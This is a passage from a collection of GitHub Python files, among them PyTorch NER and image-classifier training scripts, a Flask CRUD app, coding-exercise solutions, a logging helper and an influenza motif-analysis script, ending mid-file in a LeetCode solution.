self._get_lstm_attn_features(sentences, sent_em, lengths)\n\n # feats: (80, batch_size, tag_size)\n # tags: (batch_size, 80)\n feats = torch.transpose(feats, 0, 1)\n\n ll_loss = self.crf.forward(emissions=feats, tags=tags, mask=mask)\n return -ll_loss\n\n def forward(self, sentence, sent_em, length, mask): # don't confuse this with _forward_alg above.\n # Get the emission scores from the BiLSTM\n features = self._get_lstm_attn_features(sentence, sent_em, [length]) # (80, 1, tag_size)\n feats = torch.transpose(features, 0, 1)\n\n # Find the best path, given the features.\n tag_seq = self.crf.decode(emissions=feats, mask=mask)\n return tag_seq\n\n\n# training function\ndef model_train(train_word, train_word_em, train_length, train_label, dev_word, dev_word_em, dev_length, dev_label,\n test_word, test_word_em, test_length, test_label, setting: preprocess_update.Setting, tag_id, id_tag,\n vector, vector_em, id_to_word) -> Bilstm_crf:\n pretrained_weight1 = torch.FloatTensor(vector)\n pretrained_weight2 = torch.FloatTensor(vector_em)\n batch_size = 8\n\n model = Bilstm_crf(vocab_size=len(vector), tag_to_id=tag_id, id_to_tag=id_tag,\n embedding_dim=2*len(vector[0]), hidden_dim=400,\n pretrained_weight1=pretrained_weight1, pretrained_weight2=pretrained_weight2,\n batch_size=batch_size, drop_out=0.35, num_steps=setting.num_steps,\n id2word=id_to_word)\n\n seg_length = setting.num_steps\n train_mask = torch.zeros(train_word.shape[0], seg_length, dtype=torch.uint8) # (1350, 80)\n for i in range(train_word.shape[0]):\n train_mask[i, 0:train_length[i]] = 1\n\n dev_mask = torch.zeros(dev_word.shape[0], seg_length, dtype=torch.uint8) # (270, 80)\n for i in range(test_word.shape[0]):\n dev_mask[i, 0:dev_length[i]] = 1\n\n test_mask = torch.zeros(test_word.shape[0], seg_length, dtype=torch.uint8) # (270, 80)\n for i in range(test_word.shape[0]):\n test_mask[i, 0:test_length[i]] = 1\n\n # model.train()\n # torch.autograd.set_detect_anomaly(True)\n learning_rate = 0.0005\n # learning_rate = 0.001\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n epochs = 45\n\n for epoch in range(epochs):\n model.train()\n torch.manual_seed(epoch)\n shuffle = torch.randperm(train_word.shape[0])\n total_loss = 0\n for i in range(train_word.shape[0] // batch_size): # range(54)\n # print(f\"pre-shape: {pretrained_weight.shape}\")\n model.zero_grad()\n sentences = torch.LongTensor(train_word[shuffle[i * batch_size:(i + 1) * batch_size], :]) # (batch, 80)\n sent_em = torch.LongTensor(train_word_em[shuffle[i * batch_size:(i + 1) * batch_size], :])\n # print(f\"sentences: {sentences}\")\n tags = torch.LongTensor(train_label[shuffle[i * batch_size:(i + 1) * batch_size], :]) # (batch, 80)\n lengths = train_length[shuffle[i * batch_size:(i + 1) * batch_size]] # (batch)\n mask = train_mask[shuffle[i * batch_size:(i + 1) * batch_size], :]\n\n loss = model.neg_log_likelihood(sentences, sent_em, tags, lengths, mask) / batch_size\n # gradient/loss clipping\n # if loss > 100: loss /= 200\n total_loss += loss * batch_size\n\n if i % 20 == 0:\n print(f\"loss at epoch {epoch} batch {i} is {loss}\")\n loss.backward()\n optimizer.step()\n\n # one more step if training size is not divisible by batch size\n if train_word.shape[0] % batch_size != 0:\n last_idx = (train_word.shape[0] // batch_size) * batch_size\n model.zero_grad()\n sentences = torch.LongTensor(train_word[shuffle[last_idx:], :]) # (remained, 80)\n sent_em = torch.LongTensor(train_word_em[shuffle[last_idx:], :])\n tags = torch.LongTensor(train_label[shuffle[last_idx:], :]) # (remained, 80)\n lengths = train_length[shuffle[last_idx:]] # (remained)\n mask = train_mask[shuffle[last_idx:], :]\n\n loss = model.neg_log_likelihood(sentences, sent_em, tags, lengths, mask) / (train_word.shape[0] - last_idx)\n total_loss += loss * (train_word.shape[0] - last_idx)\n loss.backward()\n optimizer.step()\n\n print(f\"total loss after epoch {epoch} is {total_loss}\")\n\n model.eval()\n print(f\"start dev evaluate after epoch {epoch}: \")\n pred_label = []\n for i in range(dev_label.shape[0]):\n sentence = torch.IntTensor(dev_word[i].reshape(1, -1))\n sent_em = torch.IntTensor(dev_word_em[i].reshape(1, -1))\n mask = dev_mask[i, :].reshape(1, -1)\n pred = model.forward(sentence, sent_em, dev_length[i], mask)\n pred_label.append(pred[0])\n\n sent_entity = [['O' for i in range(dev_label.shape[1])] for j in range(dev_label.shape[0])]\n pred_entity = [['O' for i in range(dev_label.shape[1])] for j in range(dev_label.shape[0])]\n\n for idx in range(dev_label.shape[0]):\n for i in range(dev_length[idx]):\n sent_entity[idx][i] = id_tag[dev_label[idx, i]]\n pred_entity[idx][i] = id_tag[pred_label[idx][i]]\n\n # print('start evaluation......')\n utils.entity_eval(sent_entity, pred_entity)\n\n print(f\"start test evaluate after epoch {epoch}: \")\n model.eval()\n pred_label = []\n for i in range(test_label.shape[0]):\n sentence = torch.IntTensor(test_word[i].reshape(1, -1))\n sent_em = torch.IntTensor(test_word_em[i].reshape(1, -1))\n mask = test_mask[i, :].reshape(1, -1)\n pred = model.forward(sentence, sent_em, test_length[i], mask)\n pred_label.append(pred[0])\n\n sent_entity = [['O' for i in range(test_label.shape[1])] for j in range(test_label.shape[0])]\n pred_entity = [['O' for i in range(test_label.shape[1])] for j in range(test_label.shape[0])]\n\n for idx in range(test_label.shape[0]):\n for i in range(test_length[idx]):\n sent_entity[idx][i] = id_tag[test_label[idx, i]]\n pred_entity[idx][i] = id_tag[pred_label[idx][i]]\n\n # print('start evaluation......')\n utils.entity_eval(sent_entity, pred_entity)\n\n return model\n","repo_name":"ck44liu/NER-for-Chinese-social-media","sub_path":"model_combined.py","file_name":"model_combined.py","file_ext":"py","file_size_in_byte":15890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72864695846","text":"#!/usr/bin/env python3\n\ndef isIn(char, aStr):\n '''\n char: a single character\n aStr: an alphabetized string\n \n returns: True if char is in aStr; False otherwise\n '''\n if len(aStr) == 0:\n return False\n\n midchar = aStr[len(aStr) // 2]\n\n if midchar == char:\n return True\n\n if midchar < char:\n return isIn(char, aStr[len(aStr) // 2 + 1:])\n\n return isIn(char, aStr[:len(aStr) // 2])\n","repo_name":"rosaelton/OSSU-02.2-MITx-6.00.1x-Intro-To-CS-using-Python","sub_path":"unit-02/isin.py","file_name":"isin.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8703958877","text":"import pandas as pd\n\ndata = \"https://s3.us-east-2.amazonaws.com/bites-data/menu.csv\"\n# load the data in once, functions will use this module object\ndf = pd.read_csv(data)\n\npd.options.mode.chained_assignment = None # ignore warnings\n\n\ndef get_food_most_calories(df=df):\n \"\"\"Return the food \"Item\" string with most calories\"\"\"\n return df[df.Calories == df.Calories.max()].iloc[0].Item\n\n\ndef get_bodybuilder_friendly_foods(df=df, excl_drinks=False):\n \"\"\"Calulate the Protein/Calories ratio of foods and return the\n 5 foods with the best ratio.\n\n This function has a excl_drinks switch which, when turned on,\n should exclude 'Coffee & Tea' and 'Beverages' from this top 5.\n\n You will probably need to filter out foods with 0 calories to get the\n right results.\n\n Return a list of the top 5 foot Item stings.\"\"\"\n df.drop(df[df.Calories == 0].index, inplace=True)\n\n df['PC_Ratio'] = df.Protein / df.Calories\n\n if excl_drinks:\n df = df[(df.Category != 'Coffee & Tea') & (df.Category != 'Beverages')]\n\n top_5 = list(df.sort_values(by=['PC_Ratio'], ascending=False).iloc[0:5].Item)\n\n return top_5\n","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/without_level/170/mcdonalds.py","file_name":"mcdonalds.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8411631288","text":"def main():\n A_FROM = 2\n A_TO = 101\n A_RANGE = (2,101)\n B_FROM = 2\n B_TO = 101\n\n numbers = set()\n\n for a in range(A_FROM, A_TO):\n for b in range(B_FROM, B_TO):\n x = a**b # it can be boosted\n numbers.add(x)\n\n result = len(numbers)\n print(\"result:\", result)\n\nif __name__ == \"__main__\":\n main()","repo_name":"utevo/ProjectEuler-solutions","sub_path":"Problem 029/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24235190446","text":"import math\r\n\r\narray = [i for i in range(2*123456+1)]\r\narray[0], array[1] = False, False\r\n\r\nfor i in range(2, 2*123456+1) :\r\n for j in range(2, int(math.sqrt(i)+1)) :\r\n if array[i] % j == 0 : \r\n array[i] = False\r\n break\r\n else : array[i] = True\r\n\r\nwhile True :\r\n n = int(input())\r\n if n == 0 : break\r\n\r\n cnt = 0\r\n for i in range(n+1, 2*n+1) :\r\n if array[i] == True : cnt += 1\r\n print(cnt)","repo_name":"skawhd9588/BOJ_Algorithm","sub_path":"64. No.4948 베르트랑 공준2.py","file_name":"64. No.4948 베르트랑 공준2.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15286867792","text":"import os\nos.environ['THEANO_FLAGS'] = \"device=cuda0,force_device=True,floatX=float32,dnn.enabled=False,gcc.cxxflags=-Wno-narrowing,gpuarray.preallocate=0.4\"\n#gcc.cxxflags=-Wno-narrowing\nimport theano\nfrom pyimagesearch import load_MNIST, load_target_MNIST\nfrom pyimagesearch.nn.conv.lenet import LeNet\nfrom keras.optimizers import SGD\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn import datasets\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npath = '/home/pavel/PycharmProjects/nn/pyimagesearch/mnist-original.mat'\n\nprint(\"[INFO] accessing MNIST...\")\ndata = load_MNIST(path)\n\nif K.image_data_format() == \"channels_first\":\n data = data.reshape(data.shape[0], 1, 28, 28)\nelse:\n data = data.reshape(data.shape[0], 28, 28, 1)\n\n(trainX, testX, trainY, testY) = train_test_split(data / 255.0, load_target_MNIST(path).astype('int'), test_size=0.25, random_state=42)\n\nle = LabelBinarizer()\ntrainY = le.fit_transform(trainY)\ntestY = le.transform(testY)\n\nprint(\"[INFO] compiling model...\")\n\nmodel = LeNet.build(width=28, height=28, depth=1, classes=10)\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=SGD(lr=0.01), metrics=[\"accuracy\"])\n\nprint(\"[INFO] training network...\")\nH = model.fit(trainX, trainY, validation_data=(testX, testY), batch_size=128, epochs=20, verbose=1)\n\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX, batch_size=128)\nprint(classification_report(testY.argmax(axis=1), predictions.argmax(axis=1), target_names=[str(x) for x in le.classes_]))\n\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(np.arange(0, 20), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, 20), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, 20), H.history[\"acc\"], label=\"train_acc\")\nplt.plot(np.arange(0, 20), H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()\n","repo_name":"PaulZoni/nn","sub_path":"pyimagesearch/testmodel/lenet_mnist.py","file_name":"lenet_mnist.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32907371250","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport logging\n\nclass MyLogging(object):\n \"\"\"\n Common Logging module\n \"\"\"\n def __init__(self):\n pass\n\n def log(self, level, log_string):\n if level == \"info\":\n logging.info(log_string)\n if level == \"error\":\n logging.error(log_string)\n if level == \"warning\":\n logging.warning(log_string)\n if level == \"debug\":\n logging.debug(log_string)\n if level == \"critical\":\n logging.critical(log_string)\n print(log_string)\n \ndef setup_log_file_name(lglevel, log_file_name):\n \"\"\"\n Function to setup the testcase like setting up the logging\n with proper settings\n \"\"\"\n # Set the log level accordingly\n if(lglevel == \"debug\"):\n logLevel=logging.DEBUG\n elif(lglevel == \"info\"):\n logLevel=logging.INFO\n elif(lglevel == \"warning\"):\n logLevel=logging.WARNING\n elif(lglevel == \"error\"):\n logLevel=logging.ERROR\n elif(lglevel == \"critical\"):\n logLevel=logging.CRITICAL\n else:\n # Set default level\n logLevel=logging.INFO\n\n # Set log format with time/date, logLevel and message\n logFormat='%(asctime)s %(levelname)-8s %(message)s'\n\n # Set date format\n logDateFmt='%d %b %H:%M:%S'\n\n # Set log file name\n _inputDir = os.path.dirname(os.path.abspath(sys.argv[0]))\n #_logDir = _inputDir + \"/Logs\"\n _logDir = os.path.join(_inputDir, \"Logs\")\n\n # Logs directory exist?\n if not os.path.exists(_logDir):\n os.makedirs(_logDir)\n\n logFileName = os.path.join(_logDir, log_file_name+\".log\")\n\n print(logFileName)\n\n # Set log file mode as write\n logFileMode='w'\n # Now, configure the logging\n logging.basicConfig(level=logLevel,\n format=logFormat,\n datefmt=logDateFmt,\n filename=logFileName,\n filemode=logFileMode)\n","repo_name":"dipakdash/python","sub_path":"tools/perf/myLogging.py","file_name":"myLogging.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15556803999","text":"from collections import defaultdict\nimport utils_motif, sys, utils_graph\n\ndef get_aa_freqs(afile):\n d = {}\n elms = {}\n with open(afile) as f:\n for line in f:\n [elm, v] = line.strip().split('\\t')\n d[elm] = float(v)\n elms[elm] = True\n return (d, elms)\n\ndef check_gtr(elm, elm2fracs):\n return (elm2fracs[elm]['human'] > elm2fracs[elm]['chicken'] and elm2fracs[elm]['human'] > elm2fracs[elm]['finch'] and elm2fracs[elm]['swine'] > elm2fracs[elm]['chicken'] and elm2fracs[elm]['swine'] > elm2fracs[elm]['finch'])\n\ndef check_less(elm, elm2fracs):\n return (elm2fracs[elm]['human'] < elm2fracs[elm]['chicken'] and elm2fracs[elm]['human'] < elm2fracs[elm]['finch'] and elm2fracs[elm]['swine'] < elm2fracs[elm]['chicken'] and elm2fracs[elm]['swine'] < elm2fracs[elm]['finch'])\n\nelm2fracs = {}\nwith open(sys.argv[1]) as f:\n f.readline()\n for line in f:\n [elm, human, swine, chicken, finch] = line.strip().split('\\t')\n elm2fracs[elm] = {'human':float(human),\n 'swine':float(swine),\n 'chicken':float(chicken),\n 'finch':float(finch)}\n# del elm2fracs['LIG_PDZ_3']\n# #del elm2fracs['MOD_GSK3_1']\n# #del elm2fracs['MOD_CK1_1']\n# #del elm2fracs['MOD_CK2_1']\n\naa_freqs = {'human':get_aa_freqs('results/H_sapiens.elm_aa_freq'),\n 'chicken':get_aa_freqs('results/Gallus_gallus.elm_aa_freq'),\n 'finch':get_aa_freqs('results/Taeniopygia_guttata.elm_aa_freq'),\n 'swine':get_aa_freqs('results/Sus_scrofa.elm_aa_freq')}\nfreq_elms = {}\nfor k in aa_freqs:\n d, e = aa_freqs[k]\n for elm in e:\n freq_elms[elm] = True\n# del freq_elms['LIG_PDZ_3']\n# del freq_elms['MOD_CK1_1']\n# del freq_elms['MOD_CK2_1']\n# del freq_elms['MOD_GSK3_1']\nelm2freq = {}\nfor elm in freq_elms:\n elm2freq[elm] = {}\n for s in aa_freqs:\n if elm in aa_freqs[s][0]:\n elm2freq[elm][s] = aa_freqs[s][0][elm]\n else:\n elm2freq[elm][s] = float(0)\n\ncut = sys.argv[2]\nd = {'ELM':True}\nswine_H1N1_elms = utils_motif.protein2annotation('results/swine.H1N1.elms.' + cut, d)\nswine_H3N2_elms = utils_motif.protein2annotation('results/swine.H3N2.elms.' + cut, d)\nswine = [swine_H1N1_elms, swine_H3N2_elms]\n\nhuman_H1N1_elms = utils_motif.protein2annotation('results/human.H1N1.elms.' + cut, d)\nhuman_H3N2_elms = utils_motif.protein2annotation('results/human.H3N2.elms.' + cut, d)\nhuman_H5N1_elms = utils_motif.protein2annotation('results/human.H5N1.elms.' + cut, d)\nhuman = [human_H1N1_elms, human_H3N2_elms, human_H5N1_elms]\n\nchicken_H5N1_elms = utils_motif.protein2annotation('results/chicken.H5N1.elms.' + cut, d)\nchicken_H9N2_elms = utils_motif.protein2annotation('results/chicken.H9N2.elms.' + cut, d)\nchicken = [chicken_H5N1_elms, chicken_H9N2_elms]\n\nduck_H5N1_elms = utils_motif.protein2annotation('results/duck.H5N1.elms.' + cut, d)\nduck_H9N2_elms = utils_motif.protein2annotation('results/duck.H9N2.elms.' + cut, d)\nduck = [duck_H5N1_elms, duck_H9N2_elms]\n\n# these {}s are not completely right\n# b/c they may miss proteins not present\n# in the starting {}\ncommon_all = defaultdict(dict)\ncommon_all_elms = {}\nfor protein in human[0]:\n for elm in human[0][protein]:\n not_found = False\n for h in human[1:]:\n if protein in h:\n if not elm in h[protein]:\n not_found = True\n for s in swine:\n if protein in s:\n if not elm in s[protein]:\n not_found = True\n for c in chicken:\n if protein in c:\n if not elm in c[protein]:\n not_found = True\n for d in duck:\n if protein in d:\n if not elm in d[protein]:\n not_found = True\n if not not_found:\n common_all[protein][elm] = True\n common_all_elms[elm] = True\n\ncommon_mammal = defaultdict(dict)\nmammal_elms = {}\nfor protein in human[0]:\n for elm in human[0][protein]:\n not_found = False\n for h in human[1:]:\n if protein in h:\n if not elm in h[protein]:\n not_found = True\n for s in swine:\n if protein in s:\n if not elm in s[protein]:\n not_found = True\n if not not_found:\n common_mammal[protein][elm] = True\n mammal_elms[elm] = True\n\ncommon_bird = defaultdict(dict)\nbird_elms = {}\nfor protein in chicken[0]:\n for elm in chicken[0][protein]:\n not_found = False\n for c in chicken[1:]:\n if protein in c:\n if not elm in c[protein]:\n not_found = True\n for d in duck:\n if protein in d:\n if not elm in d[protein]:\n not_found = True\n if not not_found:\n common_bird[protein][elm] = True\n bird_elms[elm] = True\n\nuse_elms = {}\ncontrol_elms = {}\nfor protein in common_mammal:\n if protein in common_bird:\n for elm in common_mammal[protein]:\n if not elm in common_bird[protein]:\n use_elms[elm] = True#print protein + '\\t' + elm\n else:\n control_elms[elm] = True\nfor protein in common_bird:\n if protein in common_mammal:\n for elm in common_bird[protein]:\n if not elm in common_mammal[protein]:\n use_elms[elm] = True\n else:\n control_elms[elm] = True\n\n# test_elms = {}\n# with open('mammal_bird.test', 'w') as f:\n# for elm in use_elms:\n# if elm in elm2fracs:\n# if elm in mammal_elms and elm in bird_elms:\n# control_elms[elm] = True\n# else:\n# test_elms[elm] = True\n# if check_gtr(elm, elm2fracs):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2fracs):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n# else:\n# if (elm in mammal_elms and not elm in bird_elms) or (elm in bird_elms and not elm in mammal_elms):\n# print elm\n\n# with open('mammal_bird.notTest', 'w') as f:\n# for elm in control_elms:\n# if not elm in test_elms:\n# if elm in elm2fracs:\n# if check_gtr(elm, elm2fracs):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2fracs):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n\ntest_elms = {}\nwith open('mammal_bird.' + cut + '.test', 'w') as f:\n for elm in utils_graph.intersectLists([use_elms,freq_elms]):\n if elm in mammal_elms and elm in bird_elms:\n control_elms[elm] = True\n elif elm in elm2fracs:\n test_elms[elm] = True\n if check_gtr(elm, elm2fracs):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2fracs):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n else:\n test_elms[elm] = True\n if check_gtr(elm, elm2freq):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2freq):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n\nwith open('mammal_bird.' + cut + '.notTest', 'w') as f:\n for elm in freq_elms:\n if not elm in test_elms:\n if elm in elm2fracs:\n if check_gtr(elm, elm2fracs):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2fracs):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n else:\n if check_gtr(elm, elm2freq):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2freq):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n\n# with open('mammal_bird.notTest', 'w') as f:\n# for elm in utils_graph.intersectLists([control_elms,freq_elms]):\n# if not elm in test_elms:\n# if elm in elm2fracs:\n# if check_gtr(elm, elm2fracs):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2fracs):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n# else:\n# if check_gtr(elm, elm2freq):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2freq):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n\nutils_graph.dumpNodes('common_bird', utils_graph.intersectLists([elm2fracs,bird_elms]))\nutils_graph.dumpNodes('common_mammal', utils_graph.intersectLists([elm2fracs,mammal_elms]))\n \n\n","repo_name":"JudoWill/flELM","sub_path":"get_mammal_bird_diffs.py","file_name":"get_mammal_bird_diffs.py","file_ext":"py","file_size_in_byte":9046,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"759877866","text":"from application import app, db\nfrom application.models import Games\n\n@app.route('/add')\ndef add():\n new_game = Games(name=\"New Game\")\n if new_game.name == \"New Game\":\n return \" Please enter a unique game title, as this game already exists\"\n else: \n db.session.add(new_game)\n db.session.commit()\n return \"Added new game to database\"\n\n@app.route('/add/')\ndef add2(name):\n if name == Games(name=\"New Game\"):\n return \"Game already contained within list\"\n else:\n new_game2 = Games(name=\"default\")\n new_game2.name = name\n db.session.add(new_game2)\n db.session.commit()\n return new_game2.name\n\n@app.route('/read')\ndef read():\n all_games = Games.query.all()\n games_string = \"\"\n for game in all_games:\n games_string += \"
\"+ game.name\n return games_string + \"
There are \" + str(Games.query.count()) + \" Games in the database\"\n\n@app.route('/update//')\ndef update(nameold,namenew):\n game = Games.query.filter_by(name=nameold).first()\n nameold = game\n nameoldval = nameold.name\n if game is not None:\n game.name = namenew\n db.session.commit()\n return str(nameoldval) + \" is now known as \" + str(namenew)\n else:\n return \"Not available to update\"\n\n@app.route('/delete')\ndef delete():\n last_game = Games.query.first()\n db.session.delete(last_game)\n db.session.commit()\n return \"Deleted first game from database\"\n\n@app.route('/delete/')\ndef delete1(name):\n game = Games.query.filter_by(name=name).first()\n if game is not None:\n db.session.delete(game)\n db.session.commit()\n return \"Specified game deleted\"\n else:\n return \"Specified game not available\"","repo_name":"Bkirkb/QA-Excercises","sub_path":"excercise3/application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17136049018","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 16 22:00:00 2021\n\n@author: Lee SeonWoo\n\"\"\"\n#Pytorch Package\nimport torch\nfrom torch import nn, optim\nfrom torch.nn.modules.loss import BCEWithLogitsLoss\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n#Learning Rate Scheduler\nfrom torch.optim import lr_scheduler\n#Tensorboard\nfrom torch.utils.tensorboard import SummaryWriter\n\n#Utility Package\nimport os\nimport json\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom sklearn.metrics import precision_score, recall_score\n#Custom Package\nfrom utils.config import Hyperparameter\nfrom utils.air_dataloader import AirDataSet as DataLoader\n\nfrom utils.utils import plot_loss_graph, \\\n get_performance, \\\n plot_confusion_matrix,\\\n get_probability_distribution,\\\n f1_score,\\\n accuracy_fn,\\\n get_network\n#Custom Trainer\nfrom utils.trainer import Trainer\nfrom utils.lr_scheduler import CosineAnnealingWarmupRestarts\nfrom torchvision import models\n\ntime = datetime.now()\ntime = time.strftime(\"%y%m%d%H%M\")\n\nlog_path = os.path.join(Hyperparameter.log_dir, time)\nbatch_size = Hyperparameter.BATCH_SIZE\ninput_channels = Hyperparameter.INPUT_CHANNEL\nnum_classes = Hyperparameter.NUM_CLASSES\nlr = Hyperparameter.LEARNING_RATE\nnum_epochs = Hyperparameter.NUM_EPOCHS\n\n\ndataset = DataLoader('./dataset/', \n batch_size= batch_size,\n n_classes= num_classes,\n transforms=Hyperparameter.TRAIN_TRANSFORMS)\n\ntorch.manual_seed(Hyperparameter.RANDOM_SEED)\nif torch.cuda.is_available():\n torch.backends.cudnn.deterministic = True\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-net', type=str, required=True, help='net type')\nparser.add_argument('-gpu', type=bool, default=True, help='use gpu or not')\nparser.add_argument('-nc', type=int, default=5, help='number of class')\nparser.add_argument('-sz', type=int, default=3, help='input channel size')\nparser.add_argument('-cs', type=int, default=3, help='input channel size')\nargs = parser.parse_args()\n#net = get_network(args, use_gpu=args.gpu)\nnet = models.resnet50(pretrained=True)\nnum_ftrs = net.fc.in_features\n# Here the size of each output sample is set to 2.\n# Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)).\nnet.fc = nn.Linear(num_ftrs, 2)\nnet.to(Hyperparameter.device)\n#### DATA PARALLEL START ####\nif torch.cuda.device_count() > 1:\n print(\"Using\", torch.cuda.device_count(), \"GPUs\")\n net = nn.DataParallel(net)\n\n# Create writer to store values \n\nif not os.path.exists(log_path):\n # remove if it already exists\n os.mkdir(log_path)\n #os.remove(log_path)\nwriter = SummaryWriter(log_dir=log_path)\n\n\n#class_weights = {(f'{k}',f'{v:.4f}')for k, v in dataset.get_weight().items()}\nclass_weights = dataset.get_weight()\n# config = {'kernel_size' : kernel_size, \n# 'depth_step' : depth_step, \n# 'batch_size' : batch_size, \n# 'Optimizer' : 'Adam', \n# 'lr' : lr}\n\n# json_path = os.path.join(log_path,'config.json')\n# with open(json_path, 'w') as outfile:\n# json.dump(config, outfile)\n\n\nweights = torch.Tensor([class_weights[key] \\\n for key in sorted(class_weights.keys())]).to(Hyperparameter.device)\n# loss_fn = nn.NLLLoss(weights)\nif Hyperparameter.NUM_CLASSES > 1:\n loss_fn = nn.CrossEntropyLoss(weights)\nelse:\n loss_fn = nn.BCEWithLogitsLoss()\n\noptimizer = optim.Adam(net.parameters(),lr = lr)\nscheduler = scheduler = CosineAnnealingWarmupRestarts(optimizer,\n first_cycle_steps= Hyperparameter.NUM_EPOCHS//2,\n cycle_mult=0.5,\n max_lr= Hyperparameter.LEARNING_RATE,\n min_lr=0.0,\n warmup_steps=1,\n gamma=0.5)\n\ntrain_set= DataLoader('./dataset', batch_size= Hyperparameter.BATCH_SIZE,\n use='train', \n n_classes=Hyperparameter.NUM_CLASSES,\n transforms=Hyperparameter.TRAIN_TRANSFORMS)\nval_set= DataLoader('./dataset', batch_size= Hyperparameter.BATCH_SIZE,\n use='valid',\n n_classes=Hyperparameter.NUM_CLASSES,\n transforms=Hyperparameter.VALID_TRANSFORMS)\ntest_set= DataLoader('./dataset', batch_size= Hyperparameter.BATCH_SIZE,\n use='valid',\n n_classes=Hyperparameter.NUM_CLASSES,\n transforms=Hyperparameter.VALID_TRANSFORMS) \n# Train\ntrainer = Trainer(train_set= train_set, val_set= val_set, test_set= test_set, \n model= net, \n optimizer= optimizer, \n scheduler= scheduler, \n num_classes = num_classes,\n loss_fn= loss_fn, \n accuracy_fn= accuracy_fn, \n patience= Hyperparameter.PATIENCE, \n writer=writer, \n save_path=os.path.join(log_path,'best_model.pt'),\n device= Hyperparameter.device)\n\ntrain_loss, train_acc, train_pre, train_rec, train_f1,\\\n val_loss, val_acc, val_pre, val_rec, val_f1, \\\n best_val_loss = trainer.train_loop(num_epochs=Hyperparameter.NUM_EPOCHS)\n\nplot_loss_graph(train_loss=train_loss, \n train_acc=train_acc, \n train_pre=train_pre,\n train_rec=train_rec,\n train_f1=train_f1,\n val_loss=val_loss, \n val_acc=val_acc,\n val_pre= val_pre,\n val_rec=val_rec,\n val_f1= val_f1,\n save_path=os.path.join(log_path, 'result.png'))\n\nmax_acc = 0\n\n\n# Evaluation\ntest_loss, test_acc, test_pre, test_rec, test_f1, y_preds, y_targets = trainer.test_loop()\nprint (f\"test_loss: {test_loss:.3f}, \\\n test_acc: {test_acc:.3f}, test_pre: {test_pre:.3f},\\\n test_rec: {test_rec:.3f}, test_f1: {test_f1:.3f}\")\n\nwriter.close()\ntorch.save(net.state_dict(), os.path.join(log_path,'last_model.pt'))\n","repo_name":"LEE-SEON-WOO/DL_Trainer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20538762006","text":"# 解法1 使用穷举 backtracking 遍历所有可能 对每个可选择的数值只有两种可能 选 或 不选\n# 中止条件为拿出数字减剩余数值 < 0\nclass Solution:\n def combinationSum(self,candidates: list[int], target: int) -> list[list[int]]:\n # 结果\n result = []\n \n # candidates 为可选值 curIndex表示当前选择应决定的索引 curCandidates为目前尚有可能之结果 target为目标结果 totalResult为所有可能结果\n def combinationSumDFS(candidates: list[int], curIndex: int, curCandidates: list[int], target: int):\n total = sum(curCandidates)\n # 决策中止条件为 curCandidates内数值加总 